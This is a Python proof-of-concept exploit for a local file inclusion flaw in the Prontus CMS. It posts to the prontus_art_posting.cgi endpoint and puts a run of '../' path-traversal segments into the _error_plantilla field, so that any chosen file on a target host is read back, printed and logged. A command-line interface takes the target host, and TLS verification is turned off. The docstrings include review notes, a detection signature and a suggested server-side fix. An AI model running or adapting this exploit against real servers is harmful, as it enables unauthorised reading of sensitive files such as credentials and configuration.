#!/usr/bin/python3
# isra
import re
import ssl
import argparse
import requests
from urllib import request, parse
# TLS context with hostname checking and certificate verification turned off.
# check_hostname has to be cleared before verify_mode is set to CERT_NONE;
# the ssl module raises ValueError for the reverse order.
# NOTE(review): nothing else in this file references ctx. The requests calls
# in check_lfi pass verify=False themselves, so this context does not affect them.
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
def check_lfi(host, file, prontus_id, idf, ssl):
    """Send two POSTs to a Prontus posting CGI and record the second reply.

    The first POST carries only ``_NP`` and ``_IDF``. If its body contains
    "Error en los datos enviados", the IDs are treated as invalid and the
    function returns. The second POST adds ``_error_plantilla`` set to ten
    ``../`` segments followed by ``file``; its body is printed and appended
    to the log unmodified.

    Args:
        host: Host name without scheme; also used unsanitised as the log
            file name ``<host>.log`` in the current directory.
        file: Path appended after the ``../`` run.
        prontus_id: Value sent as ``_NP``.
        idf: Value sent as ``_IDF``.
        ssl: Truthy selects ``https://``, otherwise ``http://``. The name
            shadows the imported ``ssl`` module inside this function.

    Returns:
        None.

    Review notes:
        * Both requests use ``verify=False``, so the server certificate is
          not validated and the reply is unauthenticated.
        * No timeout is passed to ``requests.post``.
        * Detection: the request shape is a POST to
          ``/cgi-bin/prontus_art_posting.cgi`` whose ``_error_plantilla``
          field contains ``../`` sequences.
        * Presumably the CGI treats ``_error_plantilla`` as a template path;
          that is not verifiable from this file. If so, the fix is
          server-side: resolve the name inside a fixed template directory
          and reject values that escape it.
    """
    print("[+] Starting...")

    # The log stays open for the whole function because the final writes
    # below still need the handle.
    with open("{}.log".format(host), "a+") as log_file:
        log_file.write("\nChecking host {}\n".format(host))

        # From here on, host carries the scheme prefix.
        host = ("https://{}" if ssl else "http://{}").format(host)
        url_cgi = "{}/cgi-bin/prontus_art_posting.cgi".format(host)

        base_fields = {"_NP": prontus_id, "_IDF": idf}
        traversal_fields = dict(base_fields)
        traversal_fields["_error_plantilla"] = "../../../../../../../../../../{}".format(file)

        # Step 1: confirm the CGI accepts this Prontus ID / form ID pair.
        print("[+] Checking Prontus ID and Form ID params.")
        probe = requests.post(url_cgi, base_fields, verify=False)
        if "Error en los datos enviados" in probe.text:
            print("[-] Prontus ID or Form ID not valid. Exiting...\n")
            return

        # Step 2: repeat the request with the traversal field and keep the raw reply.
        print("[+] Sending payload & parsing content...\n")
        reply = requests.post(url_cgi, traversal_fields, verify=False)

        header = "Got reply from {}:\n".format(host)
        body = "{}\n".format(reply.text)
        print(header)
        print(body)
        log_file.write(header)
        log_file.write(body)
def main():
    """Parse the command line, echo the chosen settings, and call check_lfi.

    Positional arguments are ``host`` and ``file``. ``--prontus`` defaults to
    "nivel4", ``--form`` defaults to "postingform", and ``--ssl`` is a flag
    that selects HTTPS.
    """
    cli = argparse.ArgumentParser()
    cli.add_argument("host", help="Target host")
    cli.add_argument("file", help="Local file to include")
    cli.add_argument("--prontus", default="nivel4", help="Target Prontus ID")
    cli.add_argument("--form", default="postingform", help="Target form ID")
    cli.add_argument("--ssl", help="Enable SSL", action="store_true")
    args = cli.parse_args()

    print("#" * 80)
    print("\n***** Prontus CMS LFI PoC *****")

    # Echo each parsed setting before anything is sent.
    summary = (
        ("[+] Host: {}", args.host),
        ("[+] File: {}", args.file),
        ("[+] Prontus ID: {}", args.prontus),
        ("[+] Form ID: {}", args.form),
        ("[+] SSL: {}", args.ssl),
    )
    for template, value in summary:
        print(template.format(value))

    check_lfi(args.host, args.file, args.prontus, args.form, args.ssl)
# Run the CLI only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()